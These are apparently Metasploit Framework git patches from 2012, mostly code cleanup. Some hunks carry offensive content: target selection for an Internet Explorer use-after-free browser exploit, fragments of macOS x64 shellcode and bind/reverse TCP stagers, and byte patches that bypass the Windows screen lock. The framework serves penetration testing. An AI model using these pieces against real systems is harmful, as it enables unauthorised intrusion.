From 2db2c780d62d28307226a11c692e93addd72f839 Mon Sep 17 00:00:00 2001
From: sinn3r <msfsinn3r@gmail.com>
Date: Mon, 24 Sep 2012 17:38:19 -0500
Subject: [PATCH 09/17] Additional changes

Updated get_target function, comment for original author, possible
bug in handling page redirection.
---
 .../windows/browser/ie_execcommand_uaf.rb     | 56 +++++++++++--------
 1 file changed, 32 insertions(+), 24 deletions(-)

diff --git a/modules/exploits/windows/browser/ie_execcommand_uaf.rb b/modules/exploits/windows/browser/ie_execcommand_uaf.rb
index aa7dac9eaa..cb24f19783 100644
--- a/modules/exploits/windows/browser/ie_execcommand_uaf.rb
+++ b/modules/exploits/windows/browser/ie_execcommand_uaf.rb
@@ -39,7 +39,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			'License'        => MSF_LICENSE,
 			'Author'         =>
 				[
-					'unknown',     # Some secret ninja
+					'unknown',     # via ZDI
 					'eromang',     # First public discovery
 					'binjo',
 					'sinn3r',      # Metasploit
@@ -90,21 +90,28 @@ class Metasploit3 < Msf::Exploit::Remote
 		#If the user is already specified by the user, we'll just use that
 		return target if target.name != 'Automatic'
 
-		if agent =~ /NT 5\.1/ and agent =~ /MSIE 7/
-			return targets[1]  #IE 7 on Windows XP SP3
-		elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8/
-			return targets[2]  #IE 8 on Windows XP SP3
-		elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7/
-			return targets[3]  #IE 7 on Windows Vista
-		elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 8/
-			return targets[4]  #IE 8 on Windows Vista
-		elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8/
-			return targets[5]  #IE 8 on Windows 7
-		elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 9/
-			return targets[6]  #IE 9 on Windows 7
-		else
-			return nil
+		nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
+		ie = agent.scan(/MSIE (\d)/).flatten[0] || ''
+
+		ie_name = "IE #{ie}"
+
+		case nt
+		when '5.1'
+			os_name = 'Windows XP SP3'
+		when '6.0'
+			os_name = 'Windows Vista'
+		when '6.1'
+			os_name = 'Windows 7'
 		end
+
+		targets.each do |t|
+			if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
+				vprint_status("Target selected as: #{t.name}")
+				return t
+			end
+		end
+
+		return nil
 	end
 
 	def junk(n=4)
@@ -294,7 +301,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			js.obfuscate
 		end
 
-		html = <<-EOS
+		html = %Q|
 		<html>
 			<body>
 				<script>
@@ -309,7 +316,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		        </script>
 			</body>
 		</html>
-		EOS
+		|
 
 		return html
 	end
@@ -345,10 +352,13 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def on_request_uri(cli, request)
-		print_status request.headers['User-Agent']
-		agent = request.headers['User-Agent']
+		uri       = request.uri
+		agent     = request.headers['User-Agent']
 		my_target = get_target(agent)
 
+		vprint_status("Requesting: #{uri}")
+		print_status(agent)
+
 		# Avoid the attack if the victim doesn't have the same setup we're targeting
 		if my_target.nil?
 			print_error("Browser not supported, sending a 404: #{agent.to_s}")
@@ -356,15 +366,13 @@ class Metasploit3 < Msf::Exploit::Remote
 			return
 		end
 
-		vprint_status("Requesting: #{request.uri}")
-
-		if request.uri =~ /#{@html2_name}/
+		if uri =~ /#{@html2_name}/
 			print_status("Loading #{@html2_name}")
 			html = load_html2
-		elsif request.uri =~ /#{@html1_name}/
+		elsif uri =~ /#{@html1_name}/
 			print_status("Loading #{@html1_name}")
 			html = load_html1(cli, my_target)
-		elsif request.uri =~ /\/$/ or request.uri =~ /#{this_resource}$/
+		elsif uri =~ /\/$/ or (!this_resource.empty? and uri =~ /#{this_resource}$/)
 			print_status("Redirecting to #{@html1_name}")
 			send_redirect(cli, "#{this_resource}/#{@html1_name}")
 			return

From 2769a88f9e31513aa676618b4bcf45da8e54b549 Mon Sep 17 00:00:00 2001
From: sinn3r <msfsinn3r@gmail.com>
Date: Mon, 24 Sep 2012 17:47:14 -0500
Subject: [PATCH 10/17] Code cleanup

---
 modules/payloads/singles/osx/x64/say.rb       |  7 ++--
 .../singles/osx/x64/shell_find_tag.rb         |  9 ++---
 modules/payloads/stagers/osx/x64/bind_tcp.rb  | 34 ++++++-------------
 .../payloads/stagers/osx/x64/reverse_tcp.rb   | 32 ++++++-----------
 .../payloads/stages/osx/x64/dupandexecve.rb   |  4 ---
 5 files changed, 26 insertions(+), 60 deletions(-)

diff --git a/modules/payloads/singles/osx/x64/say.rb b/modules/payloads/singles/osx/x64/say.rb
index 476097996b..61d7bb8b3a 100644
--- a/modules/payloads/singles/osx/x64/say.rb
+++ b/modules/payloads/singles/osx/x64/say.rb
@@ -1,7 +1,3 @@
-##
-# $Id$
-##
-
 ##
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
@@ -37,7 +33,8 @@ module Metasploit3
 	# build the shellcode payload dynamically based on the user-provided CMD
 	def generate
 		say = (datastore['SAY'] || '') << "\x00"
-		call = "\xe8" + [say.length + 0xd].pack('V') 
+		call = "\xe8" + [say.length + 0xd].pack('V')
+
 		payload =
 			"\x48\x31\xC0" +                    # xor rax,rax
 			"\xB8\x3B\x00\x00\x02" +            # mov eax,0x200003b
diff --git a/modules/payloads/singles/osx/x64/shell_find_tag.rb b/modules/payloads/singles/osx/x64/shell_find_tag.rb
index 28fef6216b..885789552b 100644
--- a/modules/payloads/singles/osx/x64/shell_find_tag.rb
+++ b/modules/payloads/singles/osx/x64/shell_find_tag.rb
@@ -1,7 +1,3 @@
-##
-# $Id$
-##
-
 ##
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
@@ -45,8 +41,9 @@ module Metasploit3
 	# ensures the setting of tag to a four byte value
 	#
 	def generate
-                cmd  = (datastore['CMD'] || '') << "\x00"
-                call = "\xe8" + [cmd.length].pack('V')
+		cmd  = (datastore['CMD'] || '') << "\x00"
+		call = "\xe8" + [cmd.length].pack('V')
+
 		payload = 
 			 "\x48\x31\xFF" +                    # xor rdi,rdi
 			 "\x57" +                            # push rdi
diff --git a/modules/payloads/stagers/osx/x64/bind_tcp.rb b/modules/payloads/stagers/osx/x64/bind_tcp.rb
index 4390b1b41c..94c8e74529 100644
--- a/modules/payloads/stagers/osx/x64/bind_tcp.rb
+++ b/modules/payloads/stagers/osx/x64/bind_tcp.rb
@@ -1,7 +1,3 @@
-##
-# $Id$
-##
-
 ##
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
@@ -12,30 +8,22 @@
 require 'msf/core'
 require 'msf/core/handler/bind_tcp'
 
-###
-#
-# BindTcp
-# -------
-#
-# Mac OS X x86 bind TCP stager.
-#
-###
 module Metasploit3
 
 	include Msf::Payload::Stager
 
 	def initialize(info = { })
 		super(merge_info(info,
-			'Name'		=> 'Bind TCP Stager',
-			'Version'	=> '$Revision$',
-			'Description'	=> 'Listen, read length, read buffer, execute',
-			'Author'	=> 'nemo <nemo[at]felinemenace.org>',
-			'License'	=> MSF_LICENSE,
-			'Platform'	=> 'osx',
-			'Arch'		=> ARCH_X86_64,
-			'Handler'	=> Msf::Handler::BindTcp,
-			'Convention'	=> 'sockedi',
-			'Stager'	=>
+			'Name'        => 'Bind TCP Stager',
+			'Version'     => '$Revision$',
+			'Description' => 'Listen, read length, read buffer, execute',
+			'Author'      => 'nemo <nemo[at]felinemenace.org>',
+			'License'     => MSF_LICENSE,
+			'Platform'    => 'osx',
+			'Arch'        => ARCH_X86_64,
+			'Handler'     => Msf::Handler::BindTcp,
+			'Convention'  => 'sockedi',
+			'Stager'      =>
 			{
 				'Offsets' => { 'LPORT' => [ 31, 'n'] },
 				'Payload' =>
@@ -93,7 +81,7 @@ module Metasploit3
 					 "\x56" +                     # push rsi
 					 "\x4C\x89\xEF" +             # mov rdi,r13
 					 "\x48\x31\xC9" +             # xor rcx,rcx
-					 "\x4C\x89\xDA" + 	      # mov rdx,r11
+					 "\x4C\x89\xDA" +             # mov rdx,r11
 					 "\x4D\x31\xC0" +             # xor r8,r8
 					 "\x4D\x31\xD2" +             # xor r10,r10
 					 "\xB8\x1D\x00\x00\x02" +     # mov eax,0x200001d
diff --git a/modules/payloads/stagers/osx/x64/reverse_tcp.rb b/modules/payloads/stagers/osx/x64/reverse_tcp.rb
index 02585e916e..5a78df166d 100644
--- a/modules/payloads/stagers/osx/x64/reverse_tcp.rb
+++ b/modules/payloads/stagers/osx/x64/reverse_tcp.rb
@@ -1,7 +1,3 @@
-##
-# $Id$
-##
-
 ##
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
@@ -12,30 +8,22 @@
 require 'msf/core'
 require 'msf/core/handler/reverse_tcp'
 
-###
-#
-# ReverseTcp
-# -------
-#
-# Mac OS X x86 Reverse TCP stager.
-#
-###
 module Metasploit3
 
 	include Msf::Payload::Stager
 
 	def initialize(info = { })
 		super(merge_info(info,
-			'Name'		=> 'Reverse TCP Stager',
-			'Version'	=> '$Revision$',
-			'Description'	=> 'Connect, read length, read buffer, execute',
-			'Author'	=> 'nemo <nemo[at]felinemenace.org>',
-			'License'	=> MSF_LICENSE,
-			'Platform'	=> 'osx',
-			'Arch'		=> ARCH_X86_64,
-			'Handler'	=> Msf::Handler::ReverseTcp,
-			'Convention'	=> 'sockedi',
-			'Stager'        =>
+			'Name'        => 'Reverse TCP Stager',
+			'Version'     => '$Revision$',
+			'Description' => 'Connect, read length, read buffer, execute',
+			'Author'      => 'nemo <nemo[at]felinemenace.org>',
+			'License'     => MSF_LICENSE,
+			'Platform'    => 'osx',
+			'Arch'        => ARCH_X86_64,
+			'Handler'     => Msf::Handler::ReverseTcp,
+			'Convention'  => 'sockedi',
+			'Stager'      =>
 			{
 				'Offsets' =>
 				{
diff --git a/modules/payloads/stages/osx/x64/dupandexecve.rb b/modules/payloads/stages/osx/x64/dupandexecve.rb
index afe727791d..ddbfba85bf 100644
--- a/modules/payloads/stages/osx/x64/dupandexecve.rb
+++ b/modules/payloads/stages/osx/x64/dupandexecve.rb
@@ -1,7 +1,3 @@
-##
-# $Id$
-##
-
 ##
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit

From c0387f1441ad82b28c6c3786d1324bdf039e0faf Mon Sep 17 00:00:00 2001
From: sinn3r <msfsinn3r@gmail.com>
Date: Mon, 24 Sep 2012 18:33:13 -0500
Subject: [PATCH 11/17] Have a matching option like the post module

And make sure nemo won't get harassed by people because they
think he hacked into everyone's mac.
---
 modules/payloads/singles/osx/x64/say.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/modules/payloads/singles/osx/x64/say.rb b/modules/payloads/singles/osx/x64/say.rb
index 61d7bb8b3a..71473b145c 100644
--- a/modules/payloads/singles/osx/x64/say.rb
+++ b/modules/payloads/singles/osx/x64/say.rb
@@ -26,13 +26,13 @@ module Metasploit3
 		# exec payload options
 		register_options(
 			[
-				OptString.new('SAY',  [ true,  "The string to say", "owned by nemo"]),
+				OptString.new('TEXT',  [ true,  "The text to say", "Hello\!"]),
 		], self.class)
 	end
 
 	# build the shellcode payload dynamically based on the user-provided CMD
 	def generate
-		say = (datastore['SAY'] || '') << "\x00"
+		say = (datastore['TEXT'] || '') << "\x00"
 		call = "\xe8" + [say.length + 0xd].pack('V')
 
 		payload =

From 6bd450e114e54c1dead15e3bc75a116385987532 Mon Sep 17 00:00:00 2001
From: sinn3r <msfsinn3r@gmail.com>
Date: Mon, 24 Sep 2012 18:49:41 -0500
Subject: [PATCH 12/17] Make Ruby 1.8 happy

---
 modules/auxiliary/admin/http/scrutinizer_add_user.rb | 12 +++++++++---
 1 file changed, 9 insertions(+), 3 deletions(-)

diff --git a/modules/auxiliary/admin/http/scrutinizer_add_user.rb b/modules/auxiliary/admin/http/scrutinizer_add_user.rb
index 08e16962c6..0e6ec2c3df 100644
--- a/modules/auxiliary/admin/http/scrutinizer_add_user.rb
+++ b/modules/auxiliary/admin/http/scrutinizer_add_user.rb
@@ -6,7 +6,6 @@
 ##
 
 require 'msf/core'
-require 'json'
 
 class Metasploit3 < Msf::Auxiliary
 
@@ -45,7 +44,6 @@ class Metasploit3 < Msf::Auxiliary
 			], self.class)
 	end
 
-
 	def run
 		res = send_request_cgi({
 			'method'    => 'POST',
@@ -64,6 +62,15 @@ class Metasploit3 < Msf::Auxiliary
 		end
 
 		begin
+			require 'json'
+		rescue LoadError
+			print_error("Json is not available on your machine")
+			return
+		end
+
+		begin
+			require 'json'
+
 			j = JSON.parse(res.body)
 
 			if j['error']
@@ -78,7 +85,6 @@ class Metasploit3 < Msf::Auxiliary
 		rescue JSON::ParserError
 			print_error("Unable to parse JSON")
 			print_line(res.body)
-
 		end
 	end
 

From 54ed60e24e7f1725bbf8da1e51f02f80910fdb4a Mon Sep 17 00:00:00 2001
From: sinn3r <msfsinn3r@gmail.com>
Date: Mon, 24 Sep 2012 18:50:53 -0500
Subject: [PATCH 13/17] Forgot to remove the second require

---
 modules/auxiliary/admin/http/scrutinizer_add_user.rb | 2 --
 1 file changed, 2 deletions(-)

diff --git a/modules/auxiliary/admin/http/scrutinizer_add_user.rb b/modules/auxiliary/admin/http/scrutinizer_add_user.rb
index 0e6ec2c3df..64e4396a62 100644
--- a/modules/auxiliary/admin/http/scrutinizer_add_user.rb
+++ b/modules/auxiliary/admin/http/scrutinizer_add_user.rb
@@ -69,8 +69,6 @@ class Metasploit3 < Msf::Auxiliary
 		end
 
 		begin
-			require 'json'
-
 			j = JSON.parse(res.body)
 
 			if j['error']

From 4cd244693ff2c00793df21f7f350bc6c0f576aec Mon Sep 17 00:00:00 2001
From: sinn3r <msfsinn3r@gmail.com>
Date: Mon, 24 Sep 2012 19:13:44 -0500
Subject: [PATCH 14/17] Tabs

---
 modules/post/windows/gather/enum_db.rb | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)

diff --git a/modules/post/windows/gather/enum_db.rb b/modules/post/windows/gather/enum_db.rb
index 2d34e528ae..18f5b492b7 100644
--- a/modules/post/windows/gather/enum_db.rb
+++ b/modules/post/windows/gather/enum_db.rb
@@ -92,7 +92,7 @@ class Metasploit3 < Msf::Post
 			print_status("\tMicrosoft SQL Server found.")
 			return true
 		end
-	return false
+		return false
 	rescue
 		return false
 	end
@@ -107,7 +107,7 @@ class Metasploit3 < Msf::Post
 			print_status("\tOracle Server found.")
 			return true
 		end
-	return false
+		return false
 	rescue
 		return false
 	end
@@ -119,7 +119,7 @@ class Metasploit3 < Msf::Post
 			print_status("\tDB2 Server found.")
 			return true
 		end
-	return false
+		return false
 	rescue
 		return false
 	end
@@ -131,7 +131,7 @@ class Metasploit3 < Msf::Post
 			print_status("\tMySQL Server found.")
 			return true
 		end
-	return false
+		return false
 	rescue
 		return false
 	end
@@ -146,7 +146,7 @@ class Metasploit3 < Msf::Post
 			print_status("\tSybase Server found.")
 			return true
 		end
-	return false
+		return false
 	rescue
 		return false
 	end

From 67c5c24f6751ce57753ec949401d982bc510453a Mon Sep 17 00:00:00 2001
From: sinn3r <msfsinn3r@gmail.com>
Date: Mon, 24 Sep 2012 22:32:59 -0500
Subject: [PATCH 15/17] Fix multiple bugs

Bug fixes including:
* Unnecessary headers being manually added. Sometimes may cause
  a 400 Bad Request against specific web servers.  See issue 7165
  on Redmine for details.
* Regex fix
* URI path fix
---
 .../auxiliary/fuzzers/http/http_form_field.rb | 34 +++++--------------
 1 file changed, 9 insertions(+), 25 deletions(-)

diff --git a/modules/auxiliary/fuzzers/http/http_form_field.rb b/modules/auxiliary/fuzzers/http/http_form_field.rb
index 0ca9e4b3fd..5b6e2e2c1f 100644
--- a/modules/auxiliary/fuzzers/http/http_form_field.rb
+++ b/modules/auxiliary/fuzzers/http/http_form_field.rb
@@ -25,10 +25,10 @@ class Metasploit3 < Msf::Auxiliary
 		super(update_info(info,
 			'Name'           => 'HTTP Form Field Fuzzer',
 			'Description'    => %q{
-						This module will grab all fields from a form,
-						and launch a series of POST actions, fuzzing the contents
-						of the form fields. You can optionally fuzz headers too
-						(option is enabled by default)
+				This module will grab all fields from a form,
+				and launch a series of POST actions, fuzzing the contents
+				of the form fields. You can optionally fuzz headers too
+				(option is enabled by default)
 			},
 			'Author'  => [
 				'corelanc0d3r',
@@ -69,28 +69,12 @@ class Metasploit3 < Msf::Auxiliary
 			proto = "https://"
 		end
 
-		useragent="Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15"
-		if datastore['UserAgent'] != nil
-			if datastore['UserAgent'].length > 0
-				useragent = datastore['UserAgent']
-			end
-		end
-
-		host = datastore['RHOST']
-		if datastore['VHOST']
-			if datastore['VHOST'].length > 0
-				host = datastore['VHOST']
-			end
-		end
-
 		@send_data = {
 				:uri => '',
 				:version => '1.1',
 				:method => 'POST',
 				:headers => {
 					'Content-Length' => 100,
-					'Host' => host,
-					'User-Agent' => useragent,
 					'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
 					'Accept-Language' => 'en-us,en;q=0.5',
 					'Accept-Encoding' => 'gzip,deflate',
@@ -98,12 +82,10 @@ class Metasploit3 < Msf::Auxiliary
 					'Keep-Alive' => '300',
 					'Connection' => 'keep-alive',
 					'Referer' => proto + datastore['RHOST'] + ":" + datastore['RPORT'].to_s,
-					'Content-Type' => 'application/x-www-form-urlencoded',
+					'Content-Type' => 'application/x-www-form-urlencoded'
 				}
 			}
 		@get_data_headers = {
-				'Host' => host,
-				'User-Agent' => useragent,
 				'Referer' => proto + datastore['RHOST'] + ":" + datastore['RPORT'].to_s,
 			}
 	end
@@ -272,6 +254,8 @@ class Metasploit3 < Msf::Auxiliary
 			end
 			datastr=datastr[0,datastr.length-1]
 			@send_data[:uri] = form[:action]
+			@send_data[:uri] = "/#{form[:action]}" if @send_data[:uri][0,1] != '/'
+
 			@send_data[:method] = form[:method].upcase
 			response = send_fuzz(@send_data,datastr)
 			if not process_response(response,field,"field")
@@ -322,7 +306,7 @@ class Metasploit3 < Msf::Auxiliary
 	end
 
 	def get_field_val(input)
-		tmp = input.split(/=/)
+		tmp = input.split(/\=/)
 		#get delimeter
 		tmp2 = tmp[1].strip
 		delim = tmp2[0,1]
@@ -435,7 +419,7 @@ class Metasploit3 < Msf::Auxiliary
 										location = fielddata[0].index(thisfield)
 										delta = fielddata[0].size - location
 										remaining = fielddata[0][location,delta]
-										tmp = remaining.strip.split(/=/)
+										tmp = remaining.strip.split(/\=/)
 										if tmp.size > 1
 											delim = tmp[1][0,1]
 											tmp2 = tmp[1].split(delim)

From 6939df8d98c22a4c240a5cb70dfe4e0b2b4b8bb9 Mon Sep 17 00:00:00 2001
From: sinn3r <msfsinn3r@gmail.com>
Date: Mon, 24 Sep 2012 22:42:17 -0500
Subject: [PATCH 16/17] Support Spanish thx to Adrian Pulido

See redmine feature: #7006
---
 modules/post/windows/escalate/screen_unlock.rb | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/modules/post/windows/escalate/screen_unlock.rb b/modules/post/windows/escalate/screen_unlock.rb
index c3446babf7..413741c2af 100644
--- a/modules/post/windows/escalate/screen_unlock.rb
+++ b/modules/post/windows/escalate/screen_unlock.rb
@@ -62,7 +62,8 @@ class Metasploit3 < Msf::Post
 			{ :sig => "8bff558bec81ec88000000a1", :sigoffset => 0xb76a, :orig_code => "32c0", :patch => "b001", :patchoffset => 0xb827, :os => /Windows Vista/ },
 			{ :sig => "8bff558bec81ec88000000a1", :sigoffset => 0xb391, :orig_code => "32c0", :patch => "b001", :patchoffset => 0xb44e, :os => /Windows Vista/ },
 			{ :sig => "8bff558bec81ec88000000a1", :sigoffset => 0xacf6, :orig_code => "32c0", :patch => "b001", :patchoffset => 0xadb3, :os => /Windows Vista/ },
-			{ :sig => "8bff558bec81ec88000000a1", :sigoffset => 0xe881, :orig_code => "32c0", :patch => "b001", :patchoffset => 0xe93e, :os => /Windows 7/ }
+			{ :sig => "8bff558bec81ec88000000a1", :sigoffset => 0xe881, :orig_code => "32c0", :patch => "b001", :patchoffset => 0xe93e, :os => /Windows 7/ },
+			{ :sig => "8bff558bec83ec50a1",       :sigoffset => 0x97d3, :orig_code => "32c0", :patch => "b001", :patchoffset => 0x9878, :os => /Windows XP.*Service Pack 3 - spanish/ }
 		]
 
 		unsupported if client.platform !~ /win32|win64/i

From 1111de0197fb79555676b3608fefd9976b41fd6d Mon Sep 17 00:00:00 2001
From: sinn3r <msfsinn3r@gmail.com>
Date: Tue, 25 Sep 2012 01:19:58 -0500
Subject: [PATCH 17/17] Add OSVDB reference

---
 modules/exploits/multi/http/auxilium_upload_exec.rb | 1 +
 1 file changed, 1 insertion(+)

diff --git a/modules/exploits/multi/http/auxilium_upload_exec.rb b/modules/exploits/multi/http/auxilium_upload_exec.rb
index 0dc0a5341a..3d8f1ad57d 100644
--- a/modules/exploits/multi/http/auxilium_upload_exec.rb
+++ b/modules/exploits/multi/http/auxilium_upload_exec.rb
@@ -30,6 +30,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				],
 			'References'     =>
 				[
+					['OSVDB', '85554'],
 					['EDB', '21329']
 				],
 			'Payload'        =>